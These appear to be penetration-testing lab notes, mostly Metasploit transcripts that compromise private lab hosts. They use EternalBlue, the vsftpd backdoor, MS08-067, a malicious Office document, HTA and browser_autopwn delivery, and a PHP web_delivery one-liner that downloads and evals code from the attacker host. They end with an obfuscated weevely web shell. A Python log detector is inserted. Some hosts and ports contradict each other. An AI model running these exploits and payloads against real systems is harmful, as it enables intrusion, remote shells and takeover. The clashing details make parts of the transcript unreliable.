Starting the Penetration Test
Penetration via Host Vulnerabilities
Exploiting Operating System Vulnerabilities
Windows 7
msf6 > nmap -sT -A --script=smb-vuln-ms17-010 -P0 192.168.0.1/24
[*] exec: nmap -sT -A --script=smb-vuln-ms17-010 -P0 192.168.0.1/24

Starting Nmap 7.92 ( https://nmap.org ) at 2022-06-23 16:07 CST
Nmap scan report for 192.168.0.1
…
Nmap scan report for 192.168.0.158
…
| smb-vuln-ms17-010:
|   VULNERABLE:
|   Remote Code Execution vulnerability in Microsoft SMBv1 servers (ms17-010)
|     State: VULNERABLE
|     IDs:  CVE:CVE-2017-0143
|     Risk factor: HIGH
…
msf6 > search ms17-010

Matching Modules
================

   #  Name                                      Disclosure Date  Rank     Check  Description
   -  ----                                      ---------------  ----     -----  -----------
   0  exploit/windows/smb/ms17_010_eternalblue  2017-03-14       average  Yes    MS17-010 EternalBlue SMB Remote Windows Kernel Pool Corruption
   1  exploit/windows/smb/ms17_010_psexec       2017-03-14       normal   Yes    MS17-010 EternalRomance/EternalSynergy/EternalChampion SMB Remote Windows Code Execution
   2  auxiliary/admin/smb/ms17_010_command      2017-03-14       normal   No     MS17-010 EternalRomance/EternalSynergy/EternalChampion SMB Remote Windows Command Execution
   3  auxiliary/scanner/smb/smb_ms17_010                         normal   No     MS17-010 SMB RCE Detection
   4  exploit/windows/smb/smb_doublepulsar_rce  2017-04-14       great    Yes    SMB DOUBLEPULSAR Remote Code Execution

Interact with a module by name or index. For example info 4, use 4 or use exploit/windows/smb/smb_doublepulsar_rce

msf6 > use 0
[*] No payload configured, defaulting to windows/x64/meterpreter/reverse_tcp
msf6 exploit(windows/smb/ms17_010_eternalblue) > set rhost 192.168.0.158
rhost => 192.168.0.158
msf6 exploit(windows/smb/ms17_010_eternalblue) > exploit

[*] Started reverse TCP handler on 192.168.0.150:4444
[*] 192.168.0.158:445 - Using auxiliary/scanner/smb/smb_ms17_010 as check
[+] 192.168.0.158:445 - Host is likely VULNERABLE to MS17-010! - Windows 7 Home Basic 7601 Service Pack 1 x64 (64-bit)
[*] 192.168.0.158:445 - Scanned 1 of 1 hosts (100% complete)
[+] 192.168.0.158:445 - The target is vulnerable.
[*] 192.168.0.158:445 - Connecting to target for exploitation.
[+] 192.168.0.158:445 - Connection established for exploitation.
[+] 192.168.0.158:445 - Target OS selected valid for OS indicated by SMB reply
[*] 192.168.0.158:445 - CORE raw buffer dump (40 bytes)
[*] 192.168.0.158:445 - 0x00000000  57 69 6e 64 6f 77 73 20 37 20 48 6f 6d 65 20 42  Windows 7 Home B
[*] 192.168.0.158:445 - 0x00000010  61 73 69 63 20 37 36 30 31 20 53 65 72 76 69 63  asic 7601 Servic
[*] 192.168.0.158:445 - 0x00000020  65 20 50 61 63 6b 20 31                          e Pack 1
[+] 192.168.0.158:445 - Target arch selected valid for arch indicated by DCE/RPC reply
[*] 192.168.0.158:445 - Trying exploit with 12 Groom Allocations.
[*] 192.168.0.158:445 - Sending all but last fragment of exploit packet
[*] 192.168.0.158:445 - Starting non-paged pool grooming
[+] 192.168.0.158:445 - Sending SMBv2 buffers
[+] 192.168.0.158:445 - Closing SMBv1 connection creating free hole adjacent to SMBv2 buffer.
[*] 192.168.0.158:445 - Sending final SMBv2 buffers.
[*] 192.168.0.158:445 - Sending last fragment of exploit packet!
[*] 192.168.0.158:445 - Receiving response from exploit packet
[+] 192.168.0.158:445 - ETERNALBLUE overwrite completed successfully (0xC000000D)!
[*] 192.168.0.158:445 - Sending egg to corrupted connection.
[*] 192.168.0.158:445 - Triggering free of corrupted buffer.
[*] Sending stage (200262 bytes) to 192.168.0.158
[*] Meterpreter session 1 opened (192.168.0.150:4444 -> 192.168.0.158:49667 ) at 2022-06-23 16:32:15 +0800
[+] 192.168.0.158:445 - =-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
[+] 192.168.0.158:445 - =-=-=-=-=-=-=-=-=-=-=-=-=-WIN-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
[+] 192.168.0.158:445 - =-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=

meterpreter >
Windows 2000
msf6 > use exploit/windows/dcerpc/ms03_026_dcom
[*] Using configured payload windows/shell/reverse_tcp
msf6 exploit(windows/dcerpc/ms03_026_dcom) > show targets

Exploit targets:

   Id  Name
   --  ----
   0   Windows NT SP3-6a/2000/XP/2003 Universal

msf6 exploit(windows/dcerpc/ms03_026_dcom) > set payload windows/shell_bind_tcp
payload => windows/shell_bind_tcp
msf6 exploit(windows/dcerpc/ms03_026_dcom) > set RHOST 192.168.0.170
RHOST => 192.168.0.170
msf6 exploit(windows/dcerpc/ms03_026_dcom) > run

[*] 192.168.0.170:135 - Trying target Windows NT SP3-6a/2000/XP/2003 Universal...
[*] 192.168.0.170:135 - Binding to 4d9f4ab8-7d1c-11cf-861e-0020af6e7c57:0.0@ncacn_ip_tcp:192.168.0.170[135] ...
[*] 192.168.0.170:135 - Calling DCOM RPC with payload (1648 bytes) ...
[*] Started bind TCP handler against 192.168.0.170:4444
[*] Command shell session 1 opened (192.168.0.150:34825 -> 192.168.0.170:4444) at 2022-07-21 15:40:55 +0800

Shell Banner:
Microsoft Windows 2000 [Version 5.00.2195]
-----

C:\WINNT\system32>
Using a Trojan
Windows 10, 7, 2003
msf > use exploit/multi/handler
[*] Using configured payload generic/shell_reverse_tcp
msf exploit/multi/handler> set lhost 192.168.0.150
lhost => 192.168.0.150
msf exploit/multi/handler> set lport 8888
lport => 8888
msf exploit/multi/handler> set payload windows/meterpreter/reverse_tcp
payload => windows/meterpreter/reverse_tcp
msf exploit/multi/handler> run

[*] Started reverse TCP handler on 192.168.0.150:8888
[*] Sending stage (175686 bytes) to 192.168.0.106
[*] Meterpreter session 1 opened (192.168.0.150:8888 -> 192.168.0.106:3552) at 2022-07-21 11:02:24 +0800

meterpreter >
Penetration via Client-Side Vulnerabilities
Exploiting the vsftpd 2.3.4 software
Linux
msf6 > nmap -sT -A -P0 192.168.0.161
msf6 exploit(windows/smb/ms08_067_netapi) > nmap -sT -A -P0 192.168.0.161
[*] exec: nmap -sT -A -P0 192.168.0.161

Starting Nmap 7.92 ( https://nmap.org ) at 2022-07-14 18:36 CST
Nmap scan report for 192.168.0.161
Host is up (0.00081s latency).
Not shown: 977 closed tcp ports (conn-refused)
PORT   STATE SERVICE VERSION
21/tcp open  ftp     vsftpd 2.3.4
| ftp-syst:
|   STAT:
| FTP server status:
|      Connected to 192.168.0.150
|      Logged in as ftp
|      TYPE: ASCII
|      No session bandwidth limit
|      Session timeout in seconds is 300
|      Control connection is plain text
|      Data connections will be plain text
|      vsFTPd 2.3.4 - secure, fast, stable
|_End of status
|_ftp-anon: Anonymous FTP login allowed (FTP code 230)
22/tcp open  ssh     OpenSSH 4.7p1 Debian 8ubuntu1 (protocol 2.0)
| ssh-hostkey:
|   1024 60:0f:cf:e1:c0:5f:6a:74:d6:90:24:fa:c4:d5:6c:cd (DSA)
|_  2048 56:56:24:0f:21:1d:de:a7:2b:ae:61:b1:24:3d:e8:f3 (RSA)
23/tcp open  telnet  Linux telnetd
25/tcp open  smtp    Postfix smtpd
|_ssl-date: 2022-07-14T10:36:30+00:00; +6s from scanner time.
msf6 > search vsftpd

Matching Modules
================

   #  Name                                  Disclosure Date  Rank       Check  Description
   -  ----                                  ---------------  ----       -----  -----------
   0  exploit/unix/ftp/vsftpd_234_backdoor  2011-07-03       excellent  No     VSFTPD v2.3.4 Backdoor Command Execution

Interact with a module by name or index. For example info 0, use 0 or use exploit/unix/ftp/vsftpd_234_backdoor

msf6 > use 0
[*] No payload configured, defaulting to cmd/unix/interact
msf6 exploit(unix/ftp/vsftpd_234_backdoor) > set payload cmd/unix/interact
payload => cmd/unix/interact
msf6 exploit(unix/ftp/vsftpd_234_backdoor) > set rhost 192.168.0.161
rhost => 192.168.0.161
msf6 exploit(unix/ftp/vsftpd_234_backdoor) > exploit

[*] 192.168.0.161:21 - Banner: 220 (vsFTPd 2.3.4)
[*] 192.168.0.161:21 - USER: 331 Please specify the password.
[+] 192.168.0.161:21 - Backdoor service has been spawned, handling...
[+] 192.168.0.161:21 - UID: uid=0(root) gid=0(root)
[*] Found shell.
[*] Command shell session 1 opened (192.168.0.150:35303 -> 192.168.0.161:6200) at 2022-07-14 18:41:26 +0800
Brute-force guessing the target's open ports
Windows 2000
msf6 > use exploit/windows/smb/ms08_067_netapi
msf6 exploit(windows/smb/ms08_067_netapi) > set lhost 192.168.0.150
lhost => 192.168.0.150
msf6 exploit(windows/smb/ms08_067_netapi) > set payload windows/meterpreter/reverse_tcp_allports
msf6 exploit(windows/smb/ms08_067_netapi) > set rhost 192.168.0.158
rhost => 192.168.0.158
msf6 exploit(windows/smb/ms08_067_netapi) > run

[*] Started reverse TCP handler on 192.168.0.150:1
[*] 192.168.0.158:445 - Attempting to trigger the vulnerability...
[*] Sending stage (175686 bytes) to 192.168.0.158
[*] 192.168.0.158 - Meterpreter session 1 closed.  Reason: Died
[-] Meterpreter session 1 is not valid and will be closed

192.168.0.158 (Windows 2000) shut down automatically.
Using the msf.doc file
Windows 2000 SP0/SP4 English
msf6 exploit(windows/browser/ms10_002_aurora) > use exploit/windows/fileformat/ms11_006_createsizeddibsection
[*] No payload configured, defaulting to windows/meterpreter/reverse_tcp
msf6 exploit(windows/fileformat/ms11_006_createsizeddibsection) > info

       Name: MS11-006 Microsoft Windows CreateSizedDIBSECTION Stack Buffer Overflow
     Module: exploit/windows/fileformat/ms11_006_createsizeddibsection
   Platform: Windows
       Arch:
 Privileged: No
    License: Metasploit Framework License (BSD)
       Rank: Great
  Disclosed: 2010-12-15

Provided by:
  Moti & Xu Hao
  Yaniv Miron aka Lament of ilhack
  jduck

Available targets:
  Id  Name
  --  ----
  0   Automatic
  1   Windows 2000 SP0/SP4 English
  2   Windows XP SP3 English
  3   Crash Target for Debugging

Check supported:
  No

Basic options:
  Name      Current Setting  Required  Description
  ----      ---------------  --------  -----------
  FILENAME  msf.doc          yes       The file name.

Payload information:
  Space: 512
  Avoid: 1 characters

Description:
  This module exploits a stack-based buffer overflow in the handling of
  thumbnails within .MIC files and various Office documents. When
  processing a thumbnail bitmap containing a negative 'biClrUsed' value,
  a stack-based buffer overflow occurs. This leads to arbitrary code
  execution. In order to trigger the vulnerable code, the folder
  containing the document must be viewed using the "Thumbnails" view.

References:
  https://nvd.nist.gov/vuln/detail/CVE-2010-3970
  OSVDB (70263)
  https://docs.microsoft.com/en-us/security-updates/SecurityBulletins/2011/MS11-006
  http://www.securityfocus.com/bid/45662

msf6 exploit(windows/fileformat/ms11_006_createsizeddibsection) > set lhost 192.168.0.150
lhost => 192.168.0.150
msf6 exploit(windows/fileformat/ms11_006_createsizeddibsection) > exploit

[*] Creating 'msf.doc' file ...
[+] msf.doc created at /root/.msf4/local/msf.doc

# cp /root/.msf4/local/msf.doc /home/jerry/
Copy msf.doc to the Windows machine
msf6 > use exploit/multi/handler
[*] Using configured payload generic/shell_reverse_tcp
msf6 exploit(multi/handler) > set payload windows/meterpreter/reverse_tcp
payload => windows/meterpreter/reverse_tcp
msf6 exploit(multi/handler) > set lhost 192.168.0.150
lhost => 192.168.0.150

Open msf.doc on the Windows machine.

msf6 exploit(multi/handler) > exploit

[*] Started reverse TCP handler on 192.168.0.150:8888
[*] Sending stage (175686 bytes) to 192.168.0.169
[*] Meterpreter session 2 opened (192.168.0.150:8888 -> 192.168.0.169:1487) at 2022-07-20 15:47:53 +0800
Attacking with an HTA file
Windows 10, 7
HTA file interpreter
C:\Windows\System32\mshta.exe
Running a file with the HTA interpreter
demo.hta
<html>
<title>WEB安全测试实验</title>
<link rel="stylesheet" type="text/css" href="../css/style.css">
<head>
<meta http-equiv="Content-Type" content="text/html; charset=utf-8">
</head>
<body>
<h1>WEB 安全测试实验</h1>
</body>
</html>
Run directly
Run in the browser
Start the attack
# msfconsole
msf6 > use exploit/windows/fileformat/office_word_hta
msf6 exploit(windows/fileformat/office_word_hta) > show targets

Exploit targets:

   Id  Name
   --  ----
   0   Microsoft Office Word

msf6 exploit(windows/fileformat/office_word_hta) > run
[*] Exploit running as background job 0.
[*] Exploit completed, but no session was created.

[*] Started reverse TCP handler on 192.168.0.150:4444
msf6 exploit(windows/fileformat/office_word_hta) > [+] msf.doc stored at /home/jerry/.msf4/local/msf.doc
[*] Using URL: http://0.0.0.0:8080/default.hta
[*] Local IP: http://192.168.0.150:8080/default.hta
[*] Server started.
[*] Sending stage (175174 bytes) to 192.168.0.106
[*] Meterpreter session 1 opened (192.168.0.150:4444 -> 192.168.0.106:8176 ) at 2022-06-16 16:27:50 +0800
Open the browser on the target machine and enter http://192.168.0.150:8080/default.hta; either run it directly or save default.hta and run it afterwards. The attack succeeds.
msf6 exploit(windows/fileformat/office_word_hta) > sessions

Active sessions
===============

  Id  Name  Type                     Information                              Connection
  --  ----  ----                     -----------                              ----------
  1         meterpreter x86/windows  DESKTOP-9A8VFKB\xiang @ DESKTOP-9A8VFKB  192.168.0.150:4444 -> 192.168.0.106:8176 (192.168.0.106)

msf6 exploit(windows/fileformat/office_word_hta) > sessions -i 1
[*] Starting interaction with 1...

meterpreter > ls
Listing: C:\Users\xiang\Downloads
=================================

Mode              Size  Type  Last modified              Name
----              ----  ----  -------------              ----
100666/rw-rw-rw-  7185  fil   2022-06-16 16:26:27 +0800  default.hta
100666/rw-rw-rw-  282   fil   2021-04-27 15:13:52 +0800  desktop.ini

meterpreter > pwd
C:\Users\xiang\Downloads
meterpreter > getuid
Server username: DESKTOP-9A8VFKB\xiang
Attacking through a browser plugin: Adobe Flash
This did not succeed; presumably Adobe Flash is no longer supported.
# msfconsole
msf6 > search adobe_flash
msf6 > use 9
msf6 > use exploit/multi/browser/adobe_flash_hacking_team_uaf
[*] No payload configured, defaulting to windows/meterpreter/reverse_tcp
msf6 exploit(multi/browser/adobe_flash_hacking_team_uaf) > run

[*] Started reverse TCP handler on 192.168.0.150:4444
[*] Using URL: http://0.0.0.0:8080/y0dKYgEIkI2zc
[*] Local IP: http://192.168.0.150:8080/y0dKYgEIkI2zc
[*] Server started.
Install Adobe Flash Player 17 ActiveX on the target; entering http://192.168.0.150:8080/y0dKYgEIkI2zc in the browser triggers it.
Detecting Browser Vulnerabilities
Attacking with browser_autopwn
Windows 10, 7, 2003
msf6 auxiliary(server/browser_autopwn2) > use server/browser_autopwn
msf6 auxiliary(server/browser_autopwn) > set lhost 192.168.0.150
lhost => 192.168.0.150
msf6 auxiliary(server/browser_autopwn) > run
[*] Auxiliary module running as background job 27.
msf6 auxiliary(server/browser_autopwn) >
[*] Setup
[*] Starting exploit modules on host 192.168.0.150...
[*] ---
[*] Starting exploit android/browser/webview_addjavascriptinterface with payload android/meterpreter/reverse_tcp
[*] Using URL: http://0.0.0.0:8080/QOSlCDKP
[*] Local IP: http://192.168.0.150:8080/QOSlCDKP
[*] Server started.
[*] Starting exploit multi/browser/firefox_proto_crmfrequest with payload generic/shell_reverse_tcp
[*] Using URL: http://0.0.0.0:8080/LNRlnrxdQ
[*] Local IP: http://192.168.0.150:8080/LNRlnrxdQ
[*] Server started.
[*] Starting exploit multi/browser/firefox_tostring_console_injection with payload generic/shell_reverse_tcp
[*] Using URL: http://0.0.0.0:8080/SytDwnNLVJ
[*] Local IP: http://192.168.0.150:8080/SytDwnNLVJ
[*] Server started.
[*] Starting exploit multi/browser/firefox_webidl_injection with payload generic/shell_reverse_tcp
[*] Using URL: http://0.0.0.0:8080/XxbRZnvPzF
[*] Local IP: http://192.168.0.150:8080/XxbRZnvPzF
[*] Server started.
[*] Starting exploit multi/browser/java_atomicreferencearray with payload java/meterpreter/reverse_tcp
[*] Using URL: http://0.0.0.0:8080/dIavmEmlsJvA
[*] Local IP: http://192.168.0.150:8080/dIavmEmlsJvA
[*] Server started.
[*] Starting exploit multi/browser/java_jre17_jmxbean with payload java/meterpreter/reverse_tcp
[*] Using URL: http://0.0.0.0:8080/FSRTIbVUWRDsU
[*] Local IP: http://192.168.0.150:8080/FSRTIbVUWRDsU
[*] Server started.
[*] Starting exploit multi/browser/java_jre17_provider_skeleton with payload java/meterpreter/reverse_tcp
[*] Using URL: http://0.0.0.0:8080/lIROBHwdaD
[*] Local IP: http://192.168.0.150:8080/lIROBHwdaD
[*] Server started.
[*] Starting exploit multi/browser/java_jre17_reflection_types with payload java/meterpreter/reverse_tcp
[*] Using URL: http://0.0.0.0:8080/pyJEvk
[*] Local IP: http://192.168.0.150:8080/pyJEvk
[*] Server started.
[*] Starting exploit multi/browser/java_rhino with payload java/meterpreter/reverse_tcp
[*] Using URL: http://0.0.0.0:8080/huhYFRmk
[*] Local IP: http://192.168.0.150:8080/huhYFRmk
[*] Server started.
[*] Starting exploit multi/browser/java_verifier_field_access with payload java/meterpreter/reverse_tcp
[*] Using URL: http://0.0.0.0:8080/jAzqekl
[*] Local IP: http://192.168.0.150:8080/jAzqekl
[*] Server started.
[*] Starting exploit multi/browser/opera_configoverwrite with payload generic/shell_reverse_tcp
[*] Using URL: http://0.0.0.0:8080/JCbqIs
[*] Local IP: http://192.168.0.150:8080/JCbqIs
[*] Server started.
[*] Starting exploit windows/browser/adobe_flash_mp4_cprt with payload windows/meterpreter/reverse_tcp
[*] Using URL: http://0.0.0.0:8080/cBiTChJAeCWA
[*] Local IP: http://192.168.0.150:8080/cBiTChJAeCWA
[*] Server started.
[*] Starting exploit windows/browser/adobe_flash_rtmp with payload windows/meterpreter/reverse_tcp
[*] Using URL: http://0.0.0.0:8080/kRyiwct
[*] Local IP: http://192.168.0.150:8080/kRyiwct
[*] Server started.
[*] Starting exploit windows/browser/ie_cgenericelement_uaf with payload windows/meterpreter/reverse_tcp
[*] Using URL: http://0.0.0.0:8080/YYQeJjzuqe
[*] Local IP: http://192.168.0.150:8080/YYQeJjzuqe
[*] Server started.
…
[*] Using URL: http://0.0.0.0:8080/PdyJht6uQ
[*] Local IP: http://192.168.0.150:8080/PdyJht6uQ
[*] Server started.
In the browser under test, enter http://192.168.0.150:8080/PdyJht6uQ (or one of the other URLs listed above).
[*] 192.168.0.106    ie_createobject - Sending exploit HTML...
[*] 192.168.0.106    mozilla_nstreerange - Redirecting to .html URL
[*] 192.168.0.106    mozilla_nstreerange - Sending HTML
[*] 192.168.0.106    mozilla_nstreerange - Sending XUL
[-] 192.168.0.106    msxml_get_definition_code_exec - 192.168.0.106:10064 - Browser not supported: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/102.0.0.0 Safari/537.36
[-] 192.168.0.106    adobe_flash_rtmp - Browser not supported: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/102.0.0.0 Safari/537.36
[*] 192.168.0.106    ie_cgenericelement_uaf - Requesting: /YYQeJjzuqe
[-] 192.168.0.106    ie_cgenericelement_uaf - Browser not supported, sending 404: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/102.0.0.0 Safari/537.36

Interrupt: use the 'exit' command to quit
msf6 auxiliary(server/browser_autopwn) > sessions -i

Active sessions
===============

No active sessions.
Attacking with browser_autopwn2
Windows 2003
msf6 > use server/browser_autopwn2
msf6 auxiliary(server/browser_autopwn2) > run
[*] Auxiliary module running as background job 0.
[*] Searching BES exploits, please wait...
msf6 auxiliary(server/browser_autopwn2) >
[*] Starting exploit modules...
[*] Starting listeners...
[*] Time spent: 31.071206468
[*] Using URL: http://0.0.0.0:8080/IqV4IRZ7Q85f
[*] Local IP: http://192.168.0.150:8080/IqV4IRZ7Q85f
[*] The following is a list of exploits that BrowserAutoPwn will consider using.
[*] Exploits with the highest ranking and newest will be tried first.

Exploits
========

 Order  Rank       Name                                  Payload
 -----  ----       ----                                  -------
 1      Excellent  firefox_webidl_injection              firefox/shell_reverse_tcp on 4442
 2      Excellent  firefox_tostring_console_injection    firefox/shell_reverse_tcp on 4442
 3      Excellent  firefox_svg_plugin                    firefox/shell_reverse_tcp on 4442
 4      Excellent  firefox_proto_crmfrequest             firefox/shell_reverse_tcp on 4442
 5      Excellent  webview_addjavascriptinterface        android/meterpreter/reverse_tcp on 4443
 6      Excellent  samsung_knox_smdm_url                 android/meterpreter/reverse_tcp on 4443
 7      Great      adobe_flash_worker_byte_array_uaf     windows/meterpreter/reverse_tcp on 4444
 8      Great      adobe_flash_domain_memory_uaf         windows/meterpreter/reverse_tcp on 4444
 9      Great      adobe_flash_copy_pixels_to_byte_arra  windows/meterpreter/reverse_tcp on 4444
 10     Great      adobe_flash_casi32_int_overflow       windows/meterpreter/reverse_tcp on 4444
 11     Great      adobe_flash_delete_range_tl_op        osx/x86/shell_reverse_tcp on 4447
 12     Great      adobe_flash_uncompress_zlib_uaf       windows/meterpreter/reverse_tcp on 4444
 13     Great      adobe_flash_shader_job_overflow       windows/meterpreter/reverse_tcp on 4444
 14     Great      adobe_flash_shader_drawing_fill       windows/meterpreter/reverse_tcp on 4444
 15     Great      adobe_flash_pixel_bender_bof          windows/meterpreter/reverse_tcp on 4444
 16     Great      adobe_flash_opaque_background_uaf     windows/meterpreter/reverse_tcp on 4444
 17     Great      adobe_flash_net_connection_confusion  windows/meterpreter/reverse_tcp on 4444
 18     Great      adobe_flash_nellymoser_bof            windows/meterpreter/reverse_tcp on 4444
 19     Great      adobe_flash_hacking_team_uaf          windows/meterpreter/reverse_tcp on 4444
 20     Good       wellintech_kingscada_kxclientdownloa  windows/meterpreter/reverse_tcp on 4444
 21     Good       ms14_064_ole_code_execution           windows/meterpreter/reverse_tcp on 4444

[+] Please use the following URL for the browser attack:
[+] BrowserAutoPwn URL: http://192.168.0.150:8080/IqV4IRZ7Q85f
[*] Server started.
In the browser under test, enter http://192.168.0.150:8080/IqV4IRZ7Q85f
[*] Gathering target information for 192.168.0.169
[*] Sending HTML response to 192.168.0.169
[*] 192.168.0.169    wellintech_kingscada_kxclientdownload - Requested: /PIJKiQZx/hqDDuX/
[*] 192.168.0.169    wellintech_kingscada_kxclientdownload - Sending KingScada kxClientDownload.ocx ActiveX Remote Code Execution
[*] 192.168.0.169    ms14_064_ole_code_execution - Sending exploit...
[*] 192.168.0.169    ms14_064_ole_code_execution - Sending VBS stager
[*] Sending stage (175686 bytes) to 192.168.0.169
[*] Meterpreter session 3 opened (192.168.0.150:4444 -> 192.168.0.169:1525) at 2022-07-20 17:36:45 +0800
Exploiting Web Vulnerabilities
Windows 10, 7, 2003, 2000
http://192.168.0.160:8100/sec/17/example.php?cmd= is a PHP command injection vulnerability.
msf6 > use exploit/multi/script/web_delivery
[*] Using configured payload python/meterpreter/reverse_tcp
msf6 exploit(multi/script/web_delivery) > options

Module options (exploit/multi/script/web_delivery):

   Name     Current Setting  Required  Description
   ----     ---------------  --------  -----------
   SRVHOST  0.0.0.0          yes       The local host or network interface to listen on. This must be an address on the local machine or 0.0.0.0 to listen on all addresses.
   SRVPORT  8080             yes       The local port to listen on.
   SSL      false            no        Negotiate SSL for incoming connections
   SSLCert                   no        Path to a custom SSL certificate (default is randomly generated)
   URIPATH                   no        The URI to use for this exploit (default is random)

Payload options (python/meterpreter/reverse_tcp):

   Name   Current Setting  Required  Description
   ----   ---------------  --------  -----------
   LHOST                   yes       The listen address (an interface may be specified)
   LPORT  4444             yes       The listen port

Exploit target:

   Id  Name
   --  ----
   0   Python

msf6 exploit(multi/script/web_delivery) > show targets

Exploit targets:

   Id  Name
   --  ----
   0   Python
   1   PHP
   2   PSH
   3   Regsvr32
   4   pubprn
   5   SyncAppvPublishingServer
   6   PSH (Binary)
   7   Linux
   8   Mac OS X

msf6 exploit(multi/script/web_delivery) > set target 1
target => 1
msf6 exploit(multi/script/web_delivery) > set payload php/meterpreter/reverse_tcp
payload => php/meterpreter/reverse_tcp
msf6 exploit(multi/script/web_delivery) > set lhost 192.168.0.150
lhost => 192.168.0.150
msf6 exploit(multi/script/web_delivery) > set lport 8899
lport => 8888
msf6 exploit(multi/script/web_delivery) > run
[*] Exploit running as background job 2.
[*] Exploit completed, but no session was created.

[*] Started reverse TCP handler on 192.168.0.150:8899
[*] Using URL: http://0.0.0.0:8080/SPzNh9
msf6 exploit(multi/script/web_delivery) > [*] Local IP: http://192.168.0.150:8080/SPzNh9
[*] Server started.
[*] Run the following command on the target machine:
php -d allow_url_fopen=true -r "eval(file_get_contents('http://192.168.0.150:8080/SPzNh9', false, stream_context_create(['ssl'=>['verify_peer'=>false,'verify_peer_name'=>false]])));"

Enter the following in the browser:
http://192.168.0.160:8100/sec/17/example.php?cmd=php%20-d%20allow_url_fopen=true%20-r%20%22eval(file_get_contents(%27http://192.168.0.160:8080/SPzNh9%27,%20false,%20stream_context_create([%27ssl%27=%3E[%27verify_peer%27=%3Efalse,%27verify_peer_name%27=%3Efalse]])));%22

[*] 192.168.0.150    web_delivery - Delivering Payload (1114 bytes)
[*] Sending stage (39282 bytes) to 192.168.0.150
[*] Meterpreter session 1 opened (192.168.0.150:8899 -> 192.168.0.160:38676 ) at 2022-06-16 18:38:14 +0800
msf6 exploit(multi/script/web_delivery) > sessions

Active sessions
===============

  Id  Name  Type                   Information       Connection
  --  ----  ----                   -----------       ----------
  1         meterpreter php/linux  www-data @ Jerry  192.168.0.150:8899 -> 192.168.0.150:38676 (192.168.0.150)

msf6 exploit(multi/script/web_delivery) > sessions -i 1
[*] Starting interaction with 1...

meterpreter > dir
Listing: /var/www/html/sec/17
=============================

Mode              Size  Type  Last modified              Name
----              ----  ----  -------------              ----
100766/rwxrw-rw-  110   fil   2022-06-06 19:09:45 +0800  example.php

meterpreter > pwd
/var/www/html/sec/17
meterpreter > getuid
Server username: www-data
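As an added example (not part of these notes or of Metasploit), a small Python detector that would surface the web_delivery injection above in an Apache access log: it URL-decodes each request's query string and matches the indicators the PHP one-liner carries. The log lines are constructed; only the first request's query string is the one from this page.

```python
import re
from urllib.parse import unquote

# Constructed Apache access-log sample (not from the original notes). The first
# request carries the web_delivery one-liner injected through example.php?cmd=
# exactly as shown on this page; the other two are filler for contrast.
ACCESS_LOG = """\
192.168.0.150 - - [16/Jun/2022:18:38:13 +0800] "GET /sec/17/example.php?cmd=php%20-d%20allow_url_fopen=true%20-r%20%22eval(file_get_contents(%27http://192.168.0.160:8080/SPzNh9%27,%20false,%20stream_context_create([%27ssl%27=%3E[%27verify_peer%27=%3Efalse,%27verify_peer_name%27=%3Efalse]])));%22 HTTP/1.1" 200 12 "-" "Mozilla/5.0"
192.168.0.20 - - [16/Jun/2022:18:39:01 +0800] "GET /sec/17/index.php?page=about HTTP/1.1" 200 2210 "-" "Mozilla/5.0"
192.168.0.150 - - [16/Jun/2022:18:40:10 +0800] "GET /sec/17/example.php?cmd=id HTTP/1.1" 200 57 "-" "curl/7.81.0"
"""

# Common Log Format prefix: client, identity, user, timestamp, request line, status.
CLF = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>\S+) (?P<uri>\S+) [^"]*" (?P<status>\d{3})'
)

# Parameter names that, when non-empty, usually mean "run this for me".
SHELL_PARAMS = {"cmd", "exec", "command", "system"}

# Indicators matched against the URL-decoded value of every query parameter.
INDICATORS = {
    "php_cli_eval":    re.compile(r"\bphp\s+(-d\s+\S+\s+)*-r\s+", re.I),
    "remote_include":  re.compile(r"file_get_contents\s*\(\s*['\"]https?://", re.I),
    "eval_call":       re.compile(r"\beval\s*\(", re.I),
    "allow_url_fopen": re.compile(r"allow_url_fopen\s*=\s*(true|1|on)\b", re.I),
    "tls_verify_off":  re.compile(r"verify_peer(_name)?['\"]?\s*=>\s*false", re.I),
}


def decode_query(uri):
    """Split a request URI into (path, {param: decoded value}).

    Values are decoded twice: a second layer of percent-encoding is a common
    way to get past filters that decode only once.
    """
    path, _, query = uri.partition("?")
    params = {}
    for pair in filter(None, query.split("&")):
        key, _, value = pair.partition("=")
        params[unquote(key)] = unquote(unquote(value))
    return path, params


def scan_line(line):
    """Return a finding for one log line, or None when nothing is suspicious."""
    m = CLF.match(line)
    if not m:
        return None
    path, params = decode_query(m.group("uri"))
    hits = set()
    for name, value in params.items():
        if name.lower() in SHELL_PARAMS and value:
            hits.add(f"cmd_param:{name}")
        for label, rx in INDICATORS.items():
            if rx.search(value):
                hits.add(f"{label}:{name}")
    if not hits:
        return None
    return {"ip": m.group("ip"), "ts": m.group("ts"), "path": path,
            "status": int(m.group("status")), "indicators": sorted(hits)}


def scan_log(text):
    """Scan a whole log and return the list of findings, in file order."""
    return [f for f in map(scan_line, text.splitlines()) if f]


if __name__ == "__main__":
    for f in scan_log(ACCESS_LOG):
        print(f["ts"], f["ip"], f["path"], ", ".join(f["indicators"]))
```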
Remote control through a web system
# weevely generate 123456 ./testweb.php
Generated './testweb.php' with password '123456' of 677 byte size.
testweb.php
<?php
$B='$k){hg$c=strlen($hgk)hg;$l=sthghgrlen($t);hg$o="";for($i=0hg;hg$i<$l;)hg{for($j=hg0;($jhghg<hg$chg&&$i<$l);$jhg++,$ih';
$c='=@ob_get_conthgentshg();@ob_hgend_clhgean();$r=hg@bashge64_enhgcodehg(@x(@hggzhgcompresshg($o),$k));prihgnt("$phg$khgh$r$kf");}';
$R=str_replace('R','','crReaRRte_fuRncRtRion');
$L='$k="ehg10hgahgdc3hg9";$kh="49ba5hg9abbe5hg6";$khgf="e057f20fhghg883e";$p="kRXhgw88VYFzhgEOYQOk"hghg;functihgon x($hgt,';
